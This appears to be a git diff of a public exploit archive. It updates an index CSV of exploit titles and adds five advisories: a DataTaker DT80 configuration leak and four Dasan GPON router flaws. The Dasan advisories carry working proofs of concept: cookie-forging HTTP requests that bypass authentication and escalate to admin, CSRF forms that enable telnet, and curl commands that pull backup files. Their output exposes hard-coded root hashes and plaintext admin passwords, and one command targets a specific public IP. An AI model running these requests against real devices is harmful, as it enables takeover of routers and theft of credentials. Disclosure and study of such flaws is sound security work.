diff --git a/files.csv b/files.csv
index 58eda3b9b..8f0501a04 100644
--- a/files.csv
+++ b/files.csv
@@ -3423,7 +3423,7 @@ id,file,description,date,author,platform,type,port
 26249,platforms/linux/dos/26249.c,"Zebedee 2.4.1 - Remote Denial of Service",2005-09-09,Shiraishi.M,linux,dos,0
 26251,platforms/linux/dos/26251.c,"Snort 2.x - PrintTcpOptions Remote Denial of Service",2005-09-12,"VulnFact Security Labs",linux,dos,0
 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 - Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0
-26301,platforms/windows/dos/26301.txt,"Novell Groupwise 6.5.3 Client - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0
+26301,platforms/windows/dos/26301.txt,"Novell Groupwise Client 6.5.3 - Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0
 26331,platforms/multiple/dos/26331.txt,"Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service",2005-10-07,"Alexander Kornbrust",multiple,dos,0
 26322,platforms/windows/dos/26322.pl,"MusicBee 2.0.4663 - '.m3u' Denial of Service",2013-06-19,Chako,windows,dos,0
 26325,platforms/multiple/dos/26325.txt,"Mozilla Firefox 1.0.6/1.0.7 - IFRAME Handling Denial of Service",2005-10-05,"Tom Ferris",multiple,dos,0
@@ -3979,7 +3979,7 @@ id,file,description,date,author,platform,type,port
 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31553,platforms/linux/dos/31553.txt,"Wireshark 0.99.8 - LDAP Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
 31554,platforms/linux/dos/31554.txt,"Wireshark 0.99.8 - SCCP Dissector Decode As Feature Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
-31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
+31563,platforms/windows/dos/31563.txt,"SLmail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
 31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (MS08-025) (1)",2008-04-08,Whitecell,windows,dos,0
 31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 - XDR Prototype Hijacking Denial of Service",2008-04-02,"The Hacker Webzine",windows,dos,0
 31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer 8 Beta 1 - 'ieframe.dll' Script Injection",2008-04-02,"The Hacker Webzine",windows,dos,0
@@ -7198,7 +7198,7 @@ id,file,description,date,author,platform,type,port
 18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
 18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
-18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
+18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Local Privilege Escalation",2012-05-22,sickness,windows,local,0
 18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
 18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
 18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
@@ -8248,7 +8248,7 @@ id,file,description,date,author,platform,type,port
 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
 26409,platforms/windows/local/26409.py,"aSc Timetables 2013 - Stack Buffer Overflow",2013-06-24,Dark-Puzzle,windows,local,0
 26411,platforms/windows/local/26411.py,"AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow",2013-06-24,Onying,windows,local,0
-26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - nwfs.sys Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
+26418,platforms/windows/local/26418.rb,"Novell Client 4.91 SP4 - 'nwfs.sys' Privilege Escalation (Metasploit)",2013-06-24,Metasploit,windows,local,0
 26448,platforms/windows/local/26448.py,"AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow",2013-06-26,Onying,windows,local,0
 26451,platforms/linux/local/26451.rb,"ZPanel zsudo - Privilege Escalation (Metasploit)",2013-06-26,Metasploit,linux,local,0
 26452,platforms/win_x86/local/26452.rb,"Novell Client 2 SP3 - 'nicm.sys' Privilege Escalation (Metasploit)",2013-06-26,Metasploit,win_x86,local,0
@@ -8280,7 +8280,7 @@ id,file,description,date,author,platform,type,port
 27065,platforms/linux/local/27065.txt,"Cray UNICOS /usr/bin/script - Command Line Argument Local Overflow",2006-01-10,"Micheal Turner",linux,local,0
 27066,platforms/linux/local/27066.txt,"Cray UNICOS /etc/nu - '-c' Option Filename Processing Local Overflow",2006-01-10,"Micheal Turner",linux,local,0
 27168,platforms/qnx/local/27168.txt,"QNX 6.2/6.3 - Multiple Privilege Escalation / Denial of Service Vulnerabilities",2006-02-07,anonymous,qnx,local,0
-27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - Privilege Escalation",2013-07-29,sickness,windows,local,0
+27191,platforms/windows/local/27191.py,"Novell Client 2 SP3 - 'nicm.sys 3.1.11.0' Local Privilege Escalation",2013-07-29,sickness,windows,local,0
 27231,platforms/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,linux,local,0
 27282,platforms/windows/local/27282.txt,"Agnitum Outpost Security Suite 8.1 - Privilege Escalation",2013-08-02,"Ahmad Moghimi",windows,local,0
 27285,platforms/hardware/local/27285.txt,"Karotz Smart Rabbit 12.07.19.00 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,local,0
@@ -9099,7 +9099,7 @@ id,file,description,date,author,platform,type,port
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
-41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0 (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
+41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
 41999,platforms/linux/local/41999.txt,"Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation",2016-02-22,"Andrey Konovalov",linux,local,0
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
@@ -9357,7 +9357,7 @@ id,file,description,date,author,platform,type,port
 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 - (DELETE) Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143
 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80
 637,platforms/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25
-638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110
+638,platforms/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110
 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
 641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0
 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110
@@ -10734,7 +10734,7 @@ id,file,description,date,author,platform,type,port
 14941,platforms/win_x86/remote/14941.rb,"Integard Home and Pro 2 - Remote HTTP Buffer Overflow",2010-09-07,"Lincoln_ Nullthreat_ rick2600",win_x86,remote,80
 14976,platforms/linux/remote/14976.txt,"YOPS - Web Server Remote Command Execution",2010-09-11,"Rodrigo Escobar",linux,remote,0
 15001,platforms/windows/remote/15001.html,"Novell iPrint Client Browser Plugin - ExecuteRequest debug Stack Overflow",2010-09-14,Abysssec,windows,remote,0
-15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - call-back-url Stack Overflow",2010-09-19,Abysssec,windows,remote,0
+15042,platforms/windows/remote/15042.py,"Novell iPrint Client Browser Plugin - 'call-back-url' Stack Overflow",2010-09-19,Abysssec,windows,remote,0
 15005,platforms/multiple/remote/15005.txt,"IBM Lotus Domino iCalendar - Email Address Stack Buffer Overflow",2010-09-14,"A. Plaskett",multiple,remote,0
 15016,platforms/windows/remote/15016.rb,"Integard Pro 2.2.0.9026 - Windows 7 ROP-Code (Metasploit)",2010-09-15,Node,windows,remote,0
 15048,platforms/windows/remote/15048.txt,"SmarterMail 7.1.3876 - Directory Traversal",2010-09-19,sqlhacker,windows,remote,0
@@ -10955,7 +10955,7 @@ id,file,description,date,author,platform,type,port
 16396,platforms/windows/remote/16396.rb,"Microsoft SQL Server - sp_replwritetovarbin Memory Corruption (MS09-004) (via SQL Injection) (Metasploit)",2011-02-08,Metasploit,windows,remote,0
 16397,platforms/windows/remote/16397.rb,"Lyris ListManager - MSDE Weak sa Password (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16398,platforms/windows/remote/16398.rb,"Microsoft SQL Server - Hello Overflow (MS02-056) (Metasploit)",2010-04-30,Metasploit,windows,remote,0
-16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
+16399,platforms/windows/remote/16399.rb,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16400,platforms/windows/remote/16400.rb,"CA BrightStor ARCserve for Laptops & Desktops LGServer - Buffer Overflow (Metasploit) (1)",2010-05-09,Metasploit,windows,remote,0
 16401,platforms/windows/remote/16401.rb,"CA BrightStor ARCserve - Message Engine Heap Overflow (Metasploit)",2010-04-30,Metasploit,windows,remote,0
 16402,platforms/windows/remote/16402.rb,"CA BrightStor - HSM Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -13530,8 +13530,8 @@ id,file,description,date,author,platform,type,port
 24937,platforms/linux/remote/24937.rb,"HP System Management - Anonymous Access Code Execution (Metasploit)",2013-04-08,Metasploit,linux,remote,0
 24938,platforms/multiple/remote/24938.rb,"Novell ZENworks Configuration Management 10 SP3/11 SP2 - Remote Execution (Metasploit)",2013-04-08,Metasploit,multiple,remote,0
 24950,platforms/windows/remote/24950.pl,"KNet Web Server 1.04b - Stack Corruption Buffer Overflow",2013-04-12,Wireghoul,windows,remote,0
-643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110
-646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLMail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0
+643,platforms/windows/remote/643.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (2)",2004-12-21,"Haroon Rashid Astwat",windows,remote,110
+646,platforms/windows/remote/646.c,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (3)",2004-12-22,"Ivan Ivanovic",windows,remote,0
 24944,platforms/windows/remote/24944.py,"Freefloat FTP Server 1.0 - DEP Bypass with ROP",2013-04-10,negux,windows,remote,0
 24945,platforms/hardware/remote/24945.rb,"Linksys WRT54GL - apply.cgi Command Execution (Metasploit)",2013-04-10,Metasploit,hardware,remote,0
 24946,platforms/multiple/remote/24946.rb,"Adobe ColdFusion APSB13-03 - Remote Exploit (Metasploit)",2013-04-10,Metasploit,multiple,remote,0
@@ -15623,6 +15623,7 @@ id,file,description,date,author,platform,type,port
 41795,platforms/linux/remote/41795.rb,"SolarWinds LEM 6.3.1 - Remote Code Execution (Metasploit)",2017-03-17,"Mehmet Ince",linux,remote,0
 42261,platforms/windows/remote/42261.py,"Easy File Sharing Web Server 7.2 - GET Request 'PassWD' Buffer Overflow (SEH)",2017-06-27,clubjk,windows,remote,80
 42256,platforms/windows/remote/42256.rb,"Easy File Sharing HTTP Server 7.2 - POST Buffer Overflow (Metasploit)",2017-06-17,Metasploit,windows,remote,80
+42316,platforms/windows/remote/42316.ps1,"Skype for Business 2016 - Cross-Site Scripting",2017-07-12,nyxgeek,windows,remote,0
 41987,platforms/windows/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",windows,remote,0
 42287,platforms/android/remote/42287.txt,"eVestigator Forensic PenTester - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
 41718,platforms/hardware/remote/41718.txt,"Miele Professional PG 8528 - Directory Traversal",2017-03-24,"Jens Regel",hardware,remote,0
@@ -38127,4 +38128,9 @@ id,file,description,date,author,platform,type,port
 42309,platforms/hardware/webapps/42309.txt,"Pelco Sarix/Spectra Cameras - Remote Code Execution",2017-07-10,LiquidWorm,hardware,webapps,0
 42311,platforms/windows/webapps/42311.txt,"Pelco VideoXpert 1.12.105 - Directory Traversal",2017-07-10,LiquidWorm,windows,webapps,0
 42312,platforms/windows/webapps/42312.txt,"Pelco VideoXpert 1.12.105 - Information Disclosure",2017-07-10,LiquidWorm,windows,webapps,0
+42313,platforms/hardware/webapps/42313.txt,"DataTaker DT80 dEX 1.50.012 - Information Disclosure",2017-07-11,"Nassim Asrir",hardware,webapps,0
 42314,platforms/linux/webapps/42314.txt,"NfSen < 1.3.7 / AlienVault OSSIM 4.3.1 - 'customfmt' Command Injection",2017-07-11,"Paul Taylor",linux,webapps,0
+42320,platforms/hardware/webapps/42320.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Authentication Bypass",2017-07-13,LiquidWorm,hardware,webapps,0
+42321,platforms/hardware/webapps/42321.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Cross-Site Request Forgery",2017-07-13,LiquidWorm,hardware,webapps,0
+42322,platforms/hardware/webapps/42322.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Privilege Escalation",2017-07-13,LiquidWorm,hardware,webapps,0
+42323,platforms/hardware/webapps/42323.txt,"Dasan Networks GPON ONT WiFi Router H64X Series - Configuration Download",2017-07-13,LiquidWorm,hardware,webapps,0
diff --git a/platforms/hardware/webapps/42313.txt b/platforms/hardware/webapps/42313.txt
new file mode 100755
index 000000000..73b213272
--- /dev/null
+++ b/platforms/hardware/webapps/42313.txt
@@ -0,0 +1,62 @@ +[+] Title: DataTaker DT80 dEX 1.50.012 - Sensitive Configurations Exposure +[+] Credits / Discovery: Nassim Asrir +[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ +[+] Author Company: Henceforth +[+] CVE: CVE-2017-11165 + +Vendor: +=============== + +http://www.datataker.com/ + + +About: +======== + +The dataTaker DT80 smart data logger provides an extensive array of features that allow it to be used across a wide variety of applications. The DT80 is a robust, stand alone, low power data logger featuring USB memory stick support, 18 bit resolution, extensive communications capabilities and built-in display. + +The dataTaker DT80’s Dual Channel concept allows up to 10 isolated or 15 common referenced analog inputs to be used in many combinations. With support for multiple SDI-12 sensor networks, Modbus for SCADA systems, FTP and Web interface, 12V regulated output to power sensors, the DT80 is a totally self contained solution. + +Vulnerability Type: +=================== + +Sensitive Configurations Exposure. + + +issue: +=================== + +dataTaker dEX 1.350.012 allows remote attackers to obtain sensitive configuration information via +a direct request for the /services/getFile.cmd?userfile=config.xml URI. + +POC: +=================== + +http://victim/services/getFile.cmd?userfile=config.xml + + +Output: +======== + + + + + + + + + +etc.... + +username + +password + +21 + +arrdhor + +arrdhor + +YES + diff --git a/platforms/hardware/webapps/42320.txt b/platforms/hardware/webapps/42320.txt new file mode 100755 index 000000000..f28dac194 --- /dev/null +++ b/platforms/hardware/webapps/42320.txt 
@@ -0,0 +1,57 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Authentication Bypass + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The vulnerable device does not properly perform authentication +and authorization, allowing it to be bypassed through cookie manipulation. +Setting the Cookie 'Grant' with value 1 (user) or 2 (admin) will +bypass security controls in place enabling the attacker to take full +control of the device management interface. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5421 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5421.php + + +19.05.2017 + +-- + + +GET /cgi-bin/sysinfo.cgi HTTP/1.1 +Host: 192.168.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Bond-James-Bond/007 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: Grant=1; Language=english; silverheader=3c +Connection: close 
diff --git a/platforms/hardware/webapps/42321.txt b/platforms/hardware/webapps/42321.txt new file mode 100755 index 000000000..914e8d316 --- /dev/null +++ b/platforms/hardware/webapps/42321.txt @@ -0,0 +1,85 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Cross-Site Request Forgery + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 3.03p1-1145 + 3.03-1144-01 + 3.02p2-1141 + 2.77p1-1125 + 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The application interface allows users to perform certain actions +via HTTP requests without performing any validity checks to verify the +requests. This can be exploited to perform certain, if not all actions +with administrative privileges if a logged-in user visits a malicious +web site. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5422 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5422.php + + +19.05.2017 + +-- + + +Enable telnet access (disable telnet blocking): +Enable web access (disable web blocking): +----------------------------------------------- + + + + +
+ + + + +
+ + + + + +Increase session timeout (0: disable, min: 1, max: 60): +------------------------------------------------------- + + + + +
+ + +
+ + + diff --git a/platforms/hardware/webapps/42322.txt b/platforms/hardware/webapps/42322.txt new file mode 100755 index 000000000..a638de16b --- /dev/null +++ b/platforms/hardware/webapps/42322.txt 
@@ -0,0 +1,60 @@ +Dasan Networks GPON ONT WiFi Router H64X Series Privilege Escalation + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Model: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The application suffers from a privilege escalation vulnerability. +A normal user can elevate his/her privileges by changing the Cookie 'Grant' +from 1 (user) to 2 (admin) gaining administrative privileges and revealing +additional functionalities or additional advanced menu settings. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5423 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5423.php + + +19.05.2017 + +-- + + +Change cookie Grant=1 (user) to Grant=2 (admin): +------------------------------------------------ + +GET /cgi-bin/index.cgi HTTP/1.1 +Host: 192.168.0.1:8080 +Upgrade-Insecure-Requests: 1 +User-Agent: Bond-James-Bond/007 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +Cookie: Grant=2; Language=macedonian; silverheader=3c +Connection: close 
diff --git a/platforms/hardware/webapps/42323.txt b/platforms/hardware/webapps/42323.txt new file mode 100755 index 000000000..bc7c4ecc6 --- /dev/null +++ b/platforms/hardware/webapps/42323.txt 
@@ -0,0 +1,140 @@ +Dasan Networks GPON ONT WiFi Router H64X Series System Config Download + + +Vendor: Dasan Networks +Product web page: http://www.dasannetworks.com | http://www.dasannetworks.eu +Affected version: Models: H640GR-02 + H640GV-03 + H640GW-02 + H640RW-02 + H645G + Firmware: 3.02p2-1141 + 2.77p1-1125 + 2.77-1115 + 2.76-9999 + 2.76-1101 + 2.67-1070 + 2.45-1045 + +Versions 3.03x are not affected by this issue. +The running.CFG/wifi.CFG backup files are now 7z password protected. + + +Summary: H64xx is comprised of one G-PON uplink port and four ports +of Gigabit Ethernet downlink supporting 10/100/1000Base-T (RJ45). It +helps service providers to extend their core optical network all the +way to their subscribers, eliminating bandwidth bottlenecks in the +last mile. H64xx is integrated device that provide the high quality +Internet, telephony service (VoIP) and IPTV or OTT content for home +or office. H64xx enable the subscribers to make a phone call whose +quality is equal to PSTN at competitive price, and enjoy the high +quality resolution live video and service such as VoD or High Speed +Internet. + +Desc: The system backup configuration file 'running.CFG' and the wireless +backup configuration file 'wifi.CFG' can be downloaded by an attacker +from the root directory in certain circumstances. This will enable the +attacker to disclose sensitive information and help her in authentication +bypass, privilege escalation and/or full system access. + +Tested on: Server: lighttpd/1.4.31 + Server: DasanNetwork Solution + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5424 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5424.php + + +19.05.2017 + +-- + + +------------------- +#1 This PoC request is assuming that the admin or a user created a backup. 
This is done by first issuing a request +to: /cgi-bin/backuprecoversystembackup_action.cgi or /cgi-bin/backuprecoverwifibackup_action.cgi scripts that +instructs the web server to generate the running.CFG or wifi.CFG gziped files respectively. + + +curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'admin:' +######################################################################## 100.0% +(standard input):180:admin:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:admin:/etc:/bin/sh +(standard input):1442:admin:admin123:2 + +bash-4.4$ curl http://192.168.0.1/running.CFG -# | gunzip > dasan_output.txt ; strings dasan_output.txt | grep -rn 'root:' +######################################################################## 100.0% +(standard input):181:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:0:0:root:/etc:/bin/sh +(standard input):191:root:$1$s8UHZ.Iz$B4fSbmqgPsm717yQsFNfD/:14987:0:99999:7::: +bash-4.4$ + +Notice the same hard-coded shell credentials for admin and root user. +Left for the viewer to exercise 'cracking the perimeter'. ;] + +------------------- +#2 This PoC request will do an authentication bypass using the Grant cookie to create the running.CFG file. +In this request we're using Grant=1 with the account 'user' which by default has the password: user. After that, +decompressing the file, navigating to 'etc' extracted directory and reading 'web_user' file which can then +escalate privileges by reading the admin password and loggin-in. + + +bash-4.4$ curl http://192.168.0.1/cgi-bin/backuprecoversystembackup_action.cgi --cookie "silverheader=0c; Grant=1; Language=english" -H "X-Requested-With: XMLHttpRequest" ; sleep 5 +bash-4.4$ curl http://192.168.0.1/running.CFG -vv --cookie "silverheader=0c; Grant=1; Language=english" -O + % Total % Received % Xferd Average Speed Time Time Time Current + Dload Upload Total Spent Left Speed + 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0* Trying 192.168.0.1... 
+* TCP_NODELAY set +* Connected to 192.168.0.1 (192.168.0.1) port 80 (#0) +> GET /running.CFG HTTP/1.1 +> Host: 192.168.0.1 +> User-Agent: curl/7.51.0 +> Accept: */* +> Cookie: silverheader=0c; Grant=1; Language=english +> +< HTTP/1.1 200 OK +< Content-Type: application/octet-stream +< Accept-Ranges: bytes +< ETag: "2477069903" +< Last-Modified: Wed, 12 Jul 2017 19:14:18 GMT +< Content-Length: 10467 +< Date: Thu, 13 Jul 2017 00:56:14 GMT +< Server: lighttpd/1.4.31 +< +{ [1208 bytes data] + 53 10467 53 5528 0 0 5974 0 0:00:01 --:--:-- 0:00:01 5969* Curl_http_done: called premature == 0 +100 10467 100 10467 0 0 11290 0 --:--:-- --:--:-- --:--:-- 11279 +* Connection #0 to host 192.168.0.1 left intact +bash-4.4$ file running.CFG +running.CFG: gzip compressed data, last modified: Wed Jul 12 19:12:36 2017, max compression, from Unix +bash-4.4$ gunzip -v -d --suffix .CFG running.CFG ; tar -xf running ; cd etc ; cat web_user +running.CFG: 85.6% -- replaced with running +admin:admin123:2 +user:user:1 +bash-4.4$ + +Or just: + +bash-4.4$ curl -O http://180.148.2.139/running.CFG +bash-4.4$ tar -zxf running.CFG +bash-4.4$ cd etc +bash-4.4$ ls +INPUT_FILTER.conf fire_wall.conf lan_static_ip.conf ntp.conf radvd_param.conf upnpigd.conf +INPUT_REMOTE_ACCESS.conf fire_wall.sh lighttpd.conf other_security_status.sh remote_mgmt.conf user_ipv6tables.conf +dasan_output.txt hostname localtime passwd routing_entry.conf user_wan_cfg.conf +dhcp_client_dns.sh inet_check_file mac_filter.conf port_forward.conf shadow wan_ppp_mode.conf +dhcp_client_dynamic_default_dns.conf ipupdate.conf mac_source_match.conf port_forward.sh snmp web-enable +dhcpv6d.conf ipv6_route.conf multi_language.conf port_forward_dnat.sh snmp_status.conf web_user +dhcpv6d_param.conf is_safe_nat_option nat_route.conf port_forward_gre.sh sys_login_max_num webrefreshtime.conf +dmz.conf lan_dhcp_model.sh net_rest.conf ppp syslog.confx websesstime.conf +ds_mode_config lan_dhcp_server_static_ip.conf ns_ftp.conf radvd.conf 
